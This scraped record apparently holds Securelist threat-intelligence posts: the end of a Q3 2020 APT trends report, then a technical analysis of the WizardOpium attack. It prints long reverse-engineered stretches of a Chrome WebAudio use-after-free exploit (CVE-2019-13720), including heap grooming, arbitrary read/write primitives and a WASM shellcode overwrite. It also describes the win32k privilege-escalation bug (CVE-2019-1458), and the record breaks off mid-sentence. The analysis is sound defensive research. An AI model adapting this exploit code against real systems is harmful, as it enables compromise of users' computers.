the patch for this was released on August 11. We are calling this and related attacks [Operation PowerFall](<https://securelist.com/ie-and-windows-zero-day-operation-powerfall/97976/>). Currently, we are unable to establish a definitive link with any known threat actor, but due to similarities with previously discovered exploits we believe that DarkHotel may be behind this attack.\n\nOn July 22, we came across a suspicious archive file that was uploaded to VirusTotal from an Italian source. The file seemed to be a triage consisting of malicious scripts, access logs, malicious document files and several screenshots related to suspicious file detections from security solutions. After looking into these malicious document files, we identified that they are related to a Lazarus group campaign that we reported in June. This campaign, dubbed DeathNote, targeted the automobile industry and individuals in the academic field using lure documents containing aerospace and defense-related job descriptions. We are confident that these documents are related to a recently reported attack on an Israeli defense company. We have uncovered webshell scripts, C2 server scripts and malicious documents, identified several victims connected to the compromised C2 server, as well as uncovering the method used to access the C2 server.\n\nWe have observed an ongoing Sidewinder campaign that started in February, using five different malware types. The group made changes to its final payloads and continues to target government, diplomatic and military entities using current themes, such as COVID-19, in its spear-phishing efforts. While the infection mechanism remains the same as before, including the group's exploit of choice (CVE-2017-1182) and use of the DotNetToJScript tool to deploy the final payloads, we found that the actor also used ZIP archives containing a Microsoft compiled HTML Help file to download the last-stage payload. In addition to the existing .NET-based implant, which we call SystemApp, the threat actor added JS Orchestrator, the Rover/Scout backdoor and modified versions of AsyncRAT, warzoneRAT to its arsenal.\n\n## Other interesting discoveries\n\nAttribution is difficult at the best of times, and sometimes it's not possible at all. While investigating an ongoing campaign, we discovered a new Android implant undergoing development, with no clear link to any previously known Android malware. The malware is able to monitor and steal call logs, SMS, audio, video and non-media files, as well as identifying information about the infected device. It also implements an interesting feature to collect information on network routes and topology obtained using the "traceroute" command as well as using local ARP caches. During this investigation we uncovered a cluster of similar Android infostealer implants, with one example being obfuscated. We also found older Android malware that more closely resembles a backdoor, with traces of it in the wild dating back to August 2019.\n\nIn April, Cisco Talos described the activities of an unknown actor targeting Azerbaijan's government and energy sector using new malware called PoetRAT. In collaboration with Kaspersky ICS CERT, we identified supplementary samples of associated malware and documents with broader targeting of multiple universities, government and industrial organizations as well as entities in the energy sector in Azerbaijan. The campaign started in early November 2019; and the attackers switched off the infrastructure immediately following publication of the Cisco Talos report. We observed a small overlap in victimology with Turla, but since there is no technically sound proof of relation between them, and we haven't been able to attribute this new set of activity to any other previously known actor, we named it Obsidian Gargoyle.\n\n## Final thoughts\n\nThe TTPs of some threat actors remain fairly consistent over time (such as using hot topics such (COVID-19) to entice users to download and execute malicious attachments sent in spear-phishing emails), while other groups reinvent themselves, developing new toolsets and widening their scope of activities, for example, to include new platforms. And while some threat actors develop [very sophisticated tools](<https://securelist.com/mosaicregressor/98849/>), for example, MosiacRegressor UEFI implant, others [have great success](<https://securelist.com/deathstalker-mercenary-triumvirate/98177/>) with basic TTPs. Our regular quarterly reviews are intended to highlight the key developments of APT groups.\n\nHere are the main trends that we've seen in Q3 2020:\n\n * Geo-politics continues to drive the development of many APT campaigns, as seen in recent months in the activities of Transparent Tribe, Sidewinder, Origami Elephant and MosaicRegressor, and in the 'naming and shaming' of various threat actors by the NCSC and the US Department of Justice.\n * Organizations in the financial sector also continue to attract attention: the activities of the mercenary group DeathStalker is a recent example.\n * We continue to observe the use of mobile implants in APT attacks with recent examples including Transparent Tribe and Origami Elephant.\n * While APT threat actors remain active across the globe, recent hotspots of activity have been Southeast Asia, the Middle East and various regions affected by the activities of Chinese-speaking APT groups.\n * Unsurprisingly, we continue to see COVID-19-themed attacks \u2013 this quarter they included WellMess and Sidewinder.\n * Among the most interesting APT campaigns this quarter were DeathStalker and MosaicRegressor: the former underlining the fact that APT groups can achieve their aims without developing highly sophisticated tools; the latter representing the leading-edge in malware development.\n\nAs always, we would note that our reports are the product of our visibility into the threat landscape. However, it should be borne in mind that, while we strive to continually improve, there is always the possibility that other sophisticated attacks may fly under our radar.", "cvss3": {}, "published": "2020-11-03T10:00:37", "type": "securelist", "title": "APT trends report Q3 2020", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-1182", "CVE-2019-13720", "CVE-2019-1458", "CVE-2020-0986", "CVE-2020-1380"], "modified": "2020-11-03T10:00:37", "id": "SECURELIST:E2805DD2729049C4BBE6F641B5ADA21C", "href": "https://securelist.com/apt-trends-report-q3-2020/99204/", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-29T22:19:56", "description": "\n\nBack in October 2019 we detected a classic watering-hole attack on a North Korea-related news site that exploited a chain of Google Chrome and Microsoft Windows zero-days. While we've already published blog posts briefly describing this operation (available [here](<https://securelist.com/chrome-0-day-exploit-cve-2019-13720-used-in-operation-wizardopium/94866/>) and [here](<https://securelist.com/windows-0-day-exploit-cve-2019-1458-used-in-operation-wizardopium/95432/>)), in this blog post we'd like to take a deep technical dive into the exploits and vulnerabilities used in this attack.\n\n## Google Chrome remote code execution exploit\n\nIn the [original blog post](<https://securelist.com/chrome-0-day-exploit-cve-2019-13720-used-in-operation-wizardopium/94866/>) we described the exploit loader responsible for initial validation of the target and execution of the next stage JavaScript code containing the full browser exploit. The exploit is huge because, besides code, it contains byte arrays with shellcode, a Portable Executable (PE) file and WebAssembly (WASM) module used in the later stages of exploitation. The exploit abused a vulnerability in the WebAudio OfflineAudioContext interface and was targeting two release builds of Google Chrome 76.0.3809.87 and 77.0.3865.75. However, the vulnerability was introduced long before that and much earlier releases with a WebAudio component are also vulnerable. At the time of our discovery the current version of Google Chrome was 78, and while this version was also affected, the exploit did not support it and had a number of checks to ensure that it would only be executed on affected versions to prevent crashes. After our report, the vulnerability was assigned CVE-2019-13720 and was fixed in version 78.0.3904.87 with the following [commit](<https://chromium.googlesource.com/chromium/src.git/+/6a2e670a243b815cf043f8da4d26ecb9a64d307b>). A use-after-free (UAF) vulnerability, it could be triggered due to a race condition between the Render and Audio threads:\n \n \n if (!buffer) {\n +\tBaseAudioContext::GraphAutoLocker context_locker(Context());\n +\tMutexLocker locker(process_lock_);\n \treverb_.reset();\n \tshared_buffer_ = nullptr;\n \treturn;\n\nAs you can see, when the audio buffer is set to null in ConvolverNode and an active buffer already exists within the Reverb object, the function SetBuffer() can destroy reverb_ and shared_buffer_ objects.\n \n \n class MODULES_EXPORT ConvolverHandler final : public AudioHandler {\n ...\n std::unique_ptr<Reverb> reverb_;\n std::unique_ptr<SharedAudioBuffer> shared_buffer_;\n ...\n\nThese objects might still be in use by the Render thread because there is no proper synchronization between the two threads in the code. A patch added two missing locks (graph lock and process lock) for when the buffer is nullified.\n\nThe exploit code was obfuscated, but we were able to fully reverse engineer it and reveal all the small details. By looking at the code, we can see the author of the exploit has excellent knowledge of the internals of specific Google Chrome components, especially the [PartitionAlloc](<https://github.com/scrapy/base-chromium/blob/master/allocator/partition_allocator/PartitionAlloc.md>) memory allocator. This can clearly be seen from the snippets of reverse engineered code below. These functions are used in the exploit to retrieve useful information from internal structures of the allocator, including: SuperPage address, PartitionPage address by index inside the SuperPage, the index of the used PartitionPage and the address of PartitionPage metadata. All constants are taken from [partition_alloc_constants.h](<https://chromium.googlesource.com/chromium/src/+/master/base/allocator/partition_allocator/partition_alloc_constants.h>):\n \n \n function getSuperPageBase(addr) {\n \tlet superPageOffsetMask = (BigInt(1) << BigInt(21)) - BigInt(1);\n \tlet superPageBaseMask = ~superPageOffsetMask;\n \tlet superPageBase = addr & superPageBaseMask;\n \treturn superPageBase;\n }\n \n function getPartitionPageBaseWithinSuperPage(addr, partitionPageIndex) {\n \tlet superPageBase = getSuperPageBase(addr);\n \tlet partitionPageBase = partitionPageIndex << BigInt(14);\n \tlet finalAddr = superPageBase + partitionPageBase;\n \treturn finalAddr;\n }\n \n function getPartitionPageIndex(addr) {\n \tlet superPageOffsetMask = (BigInt(1) << BigInt(21)) - BigInt(1);\n \tlet partitionPageIndex = (addr & superPageOffsetMask) >> BigInt(14);\n \treturn partitionPageIndex;\n }\n \n function getMetadataAreaBaseFromPartitionSuperPage(addr) {\n \tlet superPageBase = getSuperPageBase(addr);\n \tlet systemPageSize = BigInt(0x1000);\n \treturn superPageBase + systemPageSize;\n }\n \n function getPartitionPageMetadataArea(addr) {\n \tlet superPageOffsetMask = (BigInt(1) << BigInt(21)) - BigInt(1);\n \tlet partitionPageIndex = (addr & superPageOffsetMask) >> BigInt(14);\n \tlet pageMetadataSize = BigInt(0x20);\n \tlet partitionPageMetadataPtr = getMetadataAreaBaseFromPartitionSuperPage(addr) + partitionPageIndex * pageMetadataSize;\n \treturn partitionPageMetadataPtr;\n }\n\nIt's interesting that the exploit also uses the relatively new built-in [BigInt](<https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/BigInt>) class to handle 64-bit values; authors usually use their own primitives in exploits.\n\nAt first, the code initiates OfflineAudioContext and creates a huge number of IIRFilterNode objects that are initialized via two float arrays.\n \n \n let gcPreventer = [];\n let iirFilters = [];\n \n function initialSetup() {\n \tlet audioCtx = new OfflineAudioContext(1, 20, 3000);\n \n \tlet feedForward = new Float64Array(2);\n \tlet feedback = new Float64Array(1);\n \n \tfeedback[0] = 1;\n \tfeedForward[0] = 0;\n \tfeedForward[1] = -1;\n \n \tfor (let i = 0; i < 256; i++)\n iirFilters.push(audioCtx.createIIRFilter(feedForward, feedback));\n }\n\nAfter that, the exploit begins the initial stage of exploitation and tries to trigger a UAF bug. For that to work the exploit creates the objects that are needed for the Reverb component. It creates another huge OfflineAudioContext object and two ConvolverNode objects \u2013 ScriptProcessorNode to start audio processing and AudioBuffer for the audio channel.\n \n \n async function triggerUaF(doneCb) {\n \tlet audioCtx = new OfflineAudioContext(2, 0x400000, 48000);\n \tlet bufferSource = audioCtx.createBufferSource();\n \tlet convolver = audioCtx.createConvolver();\n \tlet scriptNode = audioCtx.createScriptProcessor(0x4000, 1, 1);\n \tlet channelBuffer = audioCtx.createBuffer(1, 1, 48000);\n \n \tconvolver.buffer = channelBuffer;\n \tbufferSource.buffer = channelBuffer;\n \n \tbufferSource.loop = true;\n \tbufferSource.loopStart = 0;\n \tbufferSource.loopEnd = 1;\n \n \tchannelBuffer.getChannelData(0).fill(0);\n \n \tbufferSource.connect(convolver);\n \tconvolver.connect(scriptNode);\n \tscriptNode.connect(audioCtx.destination);\n \n \tbufferSource.start();\n \n \tlet finished = false;\n \n \tscriptNode.onaudioprocess = function(evt) {\n \t\tlet channelDataArray = new Uint32Array(evt.inputBuffer.getChannelData(0).buffer);\n \n \t\tfor (let j = 0; j < channelDataArray.length; j++) {\n \t\tif (j + 1 < channelDataArray.length && channelDataArray[j] != 0 && channelDataArray[j + 1] != 0) {\n \t\t\tlet u64Array = new BigUint64Array(1);\n \t\t\tlet u32Array = new Uint32Array(u64Array.buffer);\n \t\t\tu32Array[0] = channelDataArray[j + 0];\n \t\t\tu32Array[1] = channelDataArray[j + 1];\n \n \t\t\tlet leakedAddr = byteSwapBigInt(u64Array[0]);\n \t\t\tif (leakedAddr >> BigInt(32) > BigInt(0x8000))\n \t\t\tleakedAddr -= BigInt(0x800000000000);\n \t\t\tlet superPageBase = getSuperPageBase(leakedAddr);\n \n \t \t\tif (superPageBase > BigInt(0xFFFFFFFF) && superPageBase < BigInt(0xFFFFFFFFFFFF)) {\n \t\t\tfinished = true;\n \t\t\tevt = null;\n \n \t\t\tbufferSource.disconnect();\n \t\t\tscriptNode.disconnect();\n \t\t\tconvolver.disconnect();\n \n \t\t\tsetTimeout(function() {\n \t\t\tdoneCb(leakedAddr);\n \t\t\t}, 1);\n \n \t\t\treturn;\n \t\t\t}\n \t\t}\n \t\t}\n \t};\n \n \taudioCtx.startRendering().then(function(buffer) {\n \t\tbuffer = null;\n \n \t\tif (!finished) {\n \t \tfinished = true;\n \t \ttriggerUaF(doneCb);\n \t\t}\n \t});\n \n \twhile (!finished) {\n \t\tconvolver.buffer = null;\n \t\tconvolver.buffer = channelBuffer;\n \t\tawait later(100); // wait 100 millseconds\n \t}\n };\n\nThis function is executed recursively. It fills the audio channel buffer with zeros, starts rendering offline and at the same time runs a loop that nullifies and resets the channel buffer of the ConvolverNode object and tries to trigger a bug. The exploit uses the later() function to simulate the Sleep function, suspend the current thread and let the Render and Audio threads finish execution right on time:\n \n \n function later(delay) {\n \treturn new Promise(resolve => setTimeout(resolve, delay));\n }\n\nDuring execution the exploit checks if the audio channel buffer contains any data that differs from the previously set zeroes. The existence of such data would mean the UAF was triggered successfully and at this stage the audio channel buffer should contain a leaked pointer.\n\nThe PartitionAlloc memory allocator has a special exploit mitigation that works as follows: when the memory region is freed, it byteswaps the address of the pointer and after that the byteswapped address is added to the FreeList structure. This complicates exploitation because the attempt to dereference such a pointer will crash the process. To bypass this technique the exploit uses the following primitive that simply swaps the pointer back:\n \n \n function byteSwapBigInt(x) {\n \tlet result = BigInt(0);\n \tlet tmp = x;\n \n \tfor (let i = 0; i < 8; i++) {\n \t\tresult = result << BigInt(8);\n \t\tresult += tmp & BigInt(0xFF);\n \t\ttmp = tmp >> BigInt(8);\n \t}\n \n \treturn result;\n }\n\nThe exploit uses the leaked pointer to get the address of the SuperPage structure and verifies it. If everything goes to plan, then it should be a raw pointer to a temporary_buffer_ object of the ReverbConvolverStage class that is passed to the callback function _initialUAFCallback_.\n \n \n let sharedAudioCtx;\n let iirFilterFeedforwardAllocationPtr;\n \n function initialUAFCallback(addr) {\n \tsharedAudioCtx = new OfflineAudioContext(1, 1, 3000);\n \n \tlet partitionPageIndexDelta = undefined;\n \tswitch (majorVersion) {\n \t\tcase 77: // 77.0.3865.75\n \t \tpartitionPageIndexDelta = BigInt(-26);\n \tbreak;\n \t\tcase 76: // 76.0.3809.87\n \t\tpartitionPageIndexDelta = BigInt(-25);\n \t \tbreak;\n \t}\n \n \tiirFilterFeedforwardAllocationPtr = getPartitionPageBaseWithinSuperPage(addr, getPartitionPageIndex(addr) + partitionPageIndexDelta) + BigInt(0xFF0);\n \n triggerSecondUAF(byteSwapBigInt(iirFilterFeedforwardAllocationPtr), finalUAFCallback);\n }\n\nThe exploit uses the leaked pointer to get the address of the raw pointer to the _feedforward__ array with the AudioArray<double> type that is present in the IIRProcessor object created with IIRFilterNode. This array should be located in the same SuperPage, but in different versions of Chrome this object is created in different PartitionPages and there is a special code inside initialUAFCallback to handle that.\n\nThe vulnerability is actually triggered not once but twice. After the address of the right object is acquired, the vulnerability is exploited again. This time the exploit uses two AudioBuffer objects of different sizes, and the previously retrieved address is sprayed inside the larger AudioBuffer. This function also executes recursively.\n \n \n let floatArray = new Float32Array(10);\n let audioBufferArray1 = [];\n let audioBufferArray2 = [];\n let imageDataArray = [];\n \n async function triggerSecondUAF(addr, doneCb) {\n \tlet counter = 0;\n \tlet numChannels = 1;\n \n \tlet audioCtx = new OfflineAudioContext(1, 0x100000, 48000);\n \n \tlet bufferSource = audioCtx.createBufferSource();\n \tlet convolver = audioCtx.createConvolver();\n \n \tlet bigAudioBuffer = audioCtx.createBuffer(numChannels, 0x100, 48000);\n \tlet smallAudioBuffer = audioCtx.createBuffer(numChannels, 0x2, 48000);\n \n \tsmallAudioBuffer.getChannelData(0).fill(0);\n \n \tfor (let i = 0; i < numChannels; i++) {\n \t\tlet channelDataArray = new BigUint64Array(bigAudioBuffer.getChannelData(i).buffer);\n \t\tchannelDataArray[0] = addr;\n \t}\n \n \tbufferSource.buffer = bigAudioBuffer;\n \tconvolver.buffer = smallAudioBuffer;\n \n \tbufferSource.loop = true;\n \tbufferSource.loopStart = 0;\n \tbufferSource.loopEnd = 1;\n \n \tbufferSource.connect(convolver);\n \tconvolver.connect(audioCtx.destination);\n \n \tbufferSource.start();\n \n \tlet finished = false;\n \n \taudioCtx.startRendering().then(function(buffer) {\n \t\tbuffer = null;\n \n \t\tif (finished) {\n \t\taudioCtx = null;\n \n \t\tsetTimeout(doneCb, 200);\n \t\treturn;\n \t\t} else {\n \t\tfinished = true;\n \n \t\tsetTimeout(function() {\n \t\ttriggerSecondUAF(addr, doneCb);\n \t\t}, 1);\n \t\t}\n \t});\n \n \twhile (!finished) {\n \t\tcounter++;\n \n \t\tconvolver.buffer = null;\n \n \t\tawait later(1); // wait 1 millisecond\n \n \t\tif (finished)\n \t\tbreak;\n \n \t\tfor (let i = 0; i < iirFilters.length; i++) {\n \t\tfloatArray.fill(0);\n \t iirFilters[i].getFrequencyResponse(floatArray, floatArray, floatArray);\n \n \t\tif (floatArray[0] != 3.1415927410125732) {\n \t\t\tfinished = true;\n \n \t \t\taudioBufferArray2.push(audioCtx.createBuffer(1, 1, 10000));\n \t\taudioBufferArray2.push(audioCtx.createBuffer(1, 1, 10000));\n \n \t\t\tbufferSource.disconnect();\n \t\t\tconvolver.disconnect();\n \n \t\t\treturn;\n \t\t}\n \t\t}\n \n \t\tconvolver.buffer = smallAudioBuffer;\n \n \t\tawait later(1); // wait 1 millisecond\n \t}\n }\n\nThis time the exploit uses the function _getFrequencyResponse()_ to check if exploitation was successful. The function creates an array of frequencies that is filled with a Nyquist filter and the source array for the operation is filled with zeroes.\n \n \n void IIRDSPKernel::GetFrequencyResponse(int n_frequencies,\n \tconst float* frequency_hz,\n \tfloat* mag_response,\n \tfloat* phase_response) {\n ...\n Vector<float> frequency(n_frequencies);\n double nyquist = this->Nyquist();\n // Convert from frequency in Hz to normalized frequency (0 -> 1),\n // with 1 equal to the Nyquist frequency.\n for (int k = 0; k < n_frequencies; ++k)\n \tfrequency[k] = frequency_hz[k] / nyquist;\n ...\n\nIf the resulting array contains a value other than **\u03c0****, **it means exploitation was successful. If that's the case, the exploit stops its recursion and executes the function _finalUAFCallback_ to allocate the audio channel buffer again and reclaim the previously freed memory. This function also repairs the heap to prevent possible crashes by allocating various objects of different sizes and performing defragmentation of the heap. The exploit also creates BigUint64Array, which is used later to create an arbitrary read/write primitive.\n \n \n async function finalUAFCallback() {\n \tfor (let i = 0; i < 256; i++) {\n \t\tfloatArray.fill(0);\n \n \tiirFilters[i].getFrequencyResponse(floatArray, floatArray, floatArray);\n \n \t\tif (floatArray[0] != 3.1415927410125732) {\n \t\tawait collectGargabe();\n \n \t\taudioBufferArray2 = [];\n \n \t\tfor (let j = 0; j < 80; j++)\n \t\taudioBufferArray1.push(sharedAudioCtx.createBuffer(1, 2, 10000));\n \n \t\tiirFilters = new Array(1);\n \t \t\tawait collectGargabe();\n \n \t\tfor (let j = 0; j < 336; j++)\n \t\t\timageDataArray.push(new ImageData(1, 2));\n \t\timageDataArray = new Array(10);\n \t\tawait collectGargabe();\n \n \t\tfor (let j = 0; j < audioBufferArray1.length; j++) {\n \t\t\tlet auxArray = new BigUint64Array(audioBufferArray1[j].getChannelData(0).buffer);\n \t\t\tif (auxArray[0] != BigInt(0)) {\n \t\t\tkickPayload(auxArray);\n \t\t\treturn;\n \t\t\t}\n \t\t}\n \n \t\treturn;\n \t\t}\n \t}\n }\n\nHeap defragmentation is performed with multiple calls to the improvised _collectGarbage_ function that creates a huge ArrayBuffer in a loop.\n \n \n function collectGargabe() {\n \tlet promise = new Promise(function(cb) {\n \t\tlet arg;\n \t\tfor (let i = 0; i < 400; i++)\n \t\tnew ArrayBuffer(1024 * 1024 * 60).buffer;\n \t\tcb(arg);\n \t});\n \treturn promise;\n }\n\nAfter those steps, the exploit executes the function _kickPayload()_ passing the previously created BigUint64Array containing the raw pointer address of the previously freed AudioArray's data.\n \n \n async function kickPayload(auxArray) {\n \tlet audioCtx = new OfflineAudioContext(1, 1, 3000);\n \tlet partitionPagePtr = getPartitionPageMetadataArea(byteSwapBigInt(auxArray[0]));\n \tauxArray[0] = byteSwapBigInt(partitionPagePtr);\n \tlet i = 0;\n \tdo {\n \t\tgcPreventer.push(new ArrayBuffer(8));\n \t\tif (++i > 0x100000)\n \t\treturn;\n \t} while (auxArray[0] != BigInt(0));\n \tlet freelist = new BigUint64Array(new ArrayBuffer(8));\n \tgcPreventer.push(freelist);\n \t...\n\nThe exploit manipulates the PartitionPage metadata of the freed object to achieve the following behavior. If the address of another object is written in BigUint64Array at index zero and if a new 8-byte object is created and the value located at index 0 is read back, then a value located at the previously set address will be read. If something is written at index 0 at this stage, then this value will be written to the previously set address instead.\n \n \n function read64(rwHelper, addr) {\n \trwHelper[0] = addr;\n \tvar tmp = new BigUint64Array;\n \ttmp.buffer;\n \tgcPreventer.push(tmp);\n \treturn byteSwapBigInt(rwHelper[0]);\n }\n \n function write64(rwHelper, addr, value) {\n \trwHelper[0] = addr;\n \tvar tmp = new BigUint64Array(1);\n \ttmp.buffer;\n \ttmp[0] = value;\n \tgcPreventer.push(tmp);\n }\n\nAfter the building of the arbitrary read/write primitives comes the final stage \u2013 executing the code. The exploit achieves this by using a popular technique that exploits the Web Assembly (WASM) functionality. Google Chrome currently allocates pages for just-in-time (JIT) compiled code with read/write/execute (RWX) privileges and this can be used to overwrite them with shellcode. At first, the exploit initiates a \"dummy\" WASM module and it results in the allocation of memory pages for JIT compiled code.\n \n \n const wasmBuffer = new Uint8Array([...]);\n const wasmBlob = new Blob([wasmBuffer], {\n \ttype: \"application/wasm\"\n });\n \n const wasmUrl = URL.createObjectURL(wasmBlob);\n var wasmFuncA = undefined;\n WebAssembly.instantiateStreaming(fetch(wasmUrl), {}).then(function(result) {\n \twasmFuncA = result.instance.exports.a;\n });\n\nTo execute the exported function _wasmFuncA_, the exploit creates a FileReader object. When this object is initiated with data it creates a FileReaderLoader object internally. If you can parse PartitionAlloc allocator structures and know the size of the next object that will be allocated, you can predict which address it will be allocated to. The exploit uses the _getPartitionPageFreeListHeadEntryBySlotSize()_ function with the provided size and gets the address of the next free block that will be allocated by FileReaderLoader.\n \n \n let fileReader = new FileReader;\n let fileReaderLoaderSize = 0x140;\n let fileReaderLoaderPtr = getPartitionPageFreeListHeadEntryBySlotSize(freelist, iirFilterFeedforwardAllocationPtr, fileReaderLoaderSize);\n if (!fileReaderLoaderPtr)\n \treturn;\n \n fileReader.readAsArrayBuffer(new Blob([]));\n \n let fileReaderLoaderTestPtr = getPartitionPageFreeListHeadEntryBySlotSize(freelist, iirFilterFeedforwardAllocationPtr, fileReaderLoaderSize);\n if (fileReaderLoaderPtr == fileReaderLoaderTestPtr)\n \treturn;\n\nThe exploit obtains this address twice to find out if the FileReaderLoader object was created and if the exploit can continue execution. The exploit sets the exported WASM function to be a callback for a FileReader event (in this case, an onerror callback) and because the FileReader type is derived from EventTargetWithInlineData, it can be used to get the addresses of all its events and the address of the JIT compiled exported WASM function.\n \n \n fileReader.onerror = wasmFuncA;\n \n let fileReaderPtr = read64(freelist, fileReaderLoaderPtr + BigInt(0x10)) - BigInt(0x68);\n \n let vectorPtr = read64(freelist, fileReaderPtr + BigInt(0x28));\n let registeredEventListenerPtr = read64(freelist, vectorPtr);\n let eventListenerPtr = read64(freelist, registeredEventListenerPtr);\n let eventHandlerPtr = read64(freelist, eventListenerPtr + BigInt(0x8));\n let jsFunctionObjPtr = read64(freelist, eventHandlerPtr + BigInt(0x8));\n \n let jsFunctionPtr = read64(freelist, jsFunctionObjPtr) - BigInt(1);\n let sharedFuncInfoPtr = read64(freelist, jsFunctionPtr + BigInt(0x18)) - BigInt(1);\n let wasmExportedFunctionDataPtr = read64(freelist, sharedFuncInfoPtr + BigInt(0x8)) - BigInt(1);\n let wasmInstancePtr = read64(freelist, wasmExportedFunctionDataPtr + BigInt(0x10)) - BigInt(1);\n \n let stubAddrFieldOffset = undefined;\n switch (majorVersion) {\n \tcase 77:\n \t\tstubAddrFieldOffset = BigInt(0x8) * BigInt(16);\n \tbreak;\n \tcase 76:\n \t\tstubAddrFieldOffset = BigInt(0x8) * BigInt(17);\n \tbreak\n }\n \n let stubAddr = read64(freelist, wasmInstancePtr + stubAddrFieldOffset);\n\nThe variable stubAddr contains the address of the page with the stub code that jumps to the JIT compiled WASM function. At this stage it's sufficient to overwrite it with shellcode. To do so, the exploit uses the function _getPartitionPageFreeListHeadEntryBySlotSize()_ again to find the next free block of 0x20 bytes, which is the size of the structure for the ArrayBuffer object. This object is created when the exploit creates a new audio buffer.\n \n \n let arrayBufferSize = 0x20;\n let arrayBufferPtr = getPartitionPageFreeListHeadEntryBySlotSize(freelist, iirFilterFeedforwardAllocationPtr, arrayBufferSize);\n if (!arrayBufferPtr)\n \treturn;\n \n let audioBuffer = audioCtx.createBuffer(1, 0x400, 6000);\n gcPreventer.push(audioBuffer);\n\nThe exploit uses arbitrary read/write primitives to get the address of the DataHolder class that contains the raw pointer to the data and size of the audio buffer. The exploit overwrites this pointer with stubAddr and sets a huge size.\n \n \n let dataHolderPtr = read64(freelist, arrayBufferPtr + BigInt(0x8));\n \n write64(freelist, dataHolderPtr + BigInt(0x8), stubAddr);\n write64(freelist, dataHolderPtr + BigInt(0x10), BigInt(0xFFFFFFF));\n\nNow all that's needed is to implant a Uint8Array object into the memory of this audio buffer and place shellcode there along with the Portable Executable that will be executed by the shellcode.\n \n \n let payloadArray = new Uint8Array(audioBuffer.getChannelData(0).buffer);\n payloadArray.set(shellcode, 0);\n payloadArray.set(peBinary, shellcode.length);\n\nTo prevent the possibility of a crash the exploit clears the pointer to the top of the FreeList structure used by the PartitionPage.\n \n \n write64(freelist, partitionPagePtr, BigInt(0));\n\nNow, in order to execute the shellcode, it's enough to call the exported WASM function.\n \n \n try {\n \twasmFuncA();\n } catch (e) {}\n\n## Microsoft Windows elevation of privilege exploit\n\nThe shellcode appeared to be a Reflective PE loader for the Portable Executable module that was also present in the exploit. This module mostly consisted of the code to escape Google Chrome's sandbox by exploiting the Windows kernel component win32k for the elevation of privileges and it was also responsible for downloading and executing the actual malware. On closer analysis, we found that the exploited vulnerability was in fact a zero-day. We notified Microsoft Security Response Center and they assigned it CVE-2019-1458 and fixed the vulnerability. The win32k component has something of bad reputation. It has been present since Windows NT 4.0 and, according to Microsoft, it is responsible for more than 50% of all kernel security bugs. In the last two years alone Kaspersky has found five zero-days in the wild that exploited win32k vulnerabilities. That's quite an interesting statistic considering that since the release of Windows 10, Microsoft has implemented a number of mitigations aimed at complicating exploitation of win32k vulnerabilities and the majority of zero-days that we found exploited versions of Microsoft Windows prior to the release of Windows 10 RS4. The elevation of privilege exploit used in Operation WizardOpium was built to support Windows 7, Windows 10 build 10240 and Windows 10 build 14393. It's also important to note that Google Chrome has a special security feature called [Win32k lockdown](<https://googleprojectzero.blogspot.com/2016/11/breaking-chain.html>). This security feature eliminates the whole win32k attack surface by disabling access to win32k syscalls from inside Chrome processes. Unfortunately, Win32k lockdown is only supported on machines running Windows 10. So, it's fair to assume that Operation WizardOpium targeted users running Windows 7.\n\nCVE-2019-1458 is an Arbitrary Pointer Dereference vulnerability. In win32k Window objects are represented by a tagWND structure. There are also a number of classes based on this structure: ScrollBar, Menu, Listbox, Switch and many others. The FNID field of tagWND structure is used to distinguish the type of class. Different classes also have various extra data appended to the tagWND structure. This extra data is basically just different structures that often include kernel pointers. Besides that, in the win32k component there's a syscall SetWindowLongPtr that can be used to set this extra data (after validation of course). It's worth noting that SetWindowLongPtr was related to a number of vulnerabilities in the past (e.g., CVE-2010-2744, CVE-2016-7255, and CVE-2019-0859). There's a [common issue](<https://securelist.com/new-win32k-zero-day-cve-2019-0859/90435/>) when pre-initialized extra data can lead to system procedures incorrectly handling. In the case of CVE-2019-1458, the validation performed by SetWindowLongPtr was just insufficient.\n \n \n xxxSetWindowLongPtr(tagWND *pwnd, int index, QWORD data, ...)\n \t...\n \tif ( (int)index >= gpsi->mpFnid_serverCBWndProc[(pwnd->fnid & 0x3FFF) - 0x29A] - sizeof(tagWND) )\n \t\t...\n \t\textraData = (BYTE*)tagWND + sizeof(tagWND) + index\n \t\told = *(QWORD*)extraData;\n \t\t*(QWORD*)extraData = data;\n \t\treturn old;\n\nA check for the index parameter would have prevented this bug, but prior to the patch the values for FNID_DESKTOP, FNID_SWITCH, FNID_TOOLTIPS inside the mpFnid_serverCBWndProc table were not initialized, rendering this check useless and allowing the kernel pointers inside the extra data to be overwritten.\n\nTriggering the bug is quite simple: at first, you create a Window, then NtUserMessageCall can be used to call any system class window procedure.\n \n \n gpsi->mpFnidPfn[(dwType + 6) & 0x1F]((tagWND *)wnd, msg, wParam, lParam, resultInfo);\n\nIt's important to provide the right message and dwType parameters. The message needs to be equal to WM_CREATE. dwType is converted to fnIndex internally with the following calculation: (dwType + 6) & 0x1F. The exploit uses a dwType equal to 0xE0. It results in an fnIndex equal to 6 which is the function index of _xxxSwitchWndProc _and the WM_CREATE message sets the FNID field to be equal to FNID_SWITCH.\n \n \n LRESULT xxxSwitchWndProc(tagWND *wnd, UINT msg, WPARAM wParam, LPARAM lParam)\n {\n ...\n pti = *(tagTHREADINFO **)&gptiCurrent;\n if ( wnd->fnid != FNID_SWITCH )\n {\n if ( wnd->fnid || wnd->cbwndExtra + 296 < (unsigned int)gpsi->mpFnid_serverCBWndProc[6] )\n return 0i64;\n if ( msg != 1 )\n return xxxDefWindowProc(wnd, msg, wParam, lParam);\n if ( wnd[1].head.h )\n return 0i64;\n wnd->fnid = FNID_SWITCH;\n }\n switch ( msg )\n {\n case WM_CREATE:\n zzzSetCursor(wnd->pcls->spcur, pti, 0i64);\n break;\n case WM_CLOSE:\n xxxSetWindowPos(wnd, 0, 0);\n xxxCancelCoolSwitch();\n break;\n case WM_ERASEBKGND:\n case WM_FULLSCREEN:\n pti->ptl = (_TL *)&pti->ptl;\n ++wnd->head.cLockObj;\n xxxPaintSwitchWindow(wnd, pti, 0i64);\n ThreadUnlock1();\n return 0i64;\n }\n return xxxDefWindowProc(wnd, msg, wParam, lParam);\n }\n\nThe vulnerability in _NtUserSetWindowLongPtr_ can then be used to overwrite the extra data at index zero, which happens to be a pointer to a structure containing information about the Switch Window. In other words, the vulnerability makes it possible to set some arbitrary kernel pointer that will be treated as this structure.\n\nAt this stage it's enough to call _NtUserMessageCall_ again, but this time with a message equal 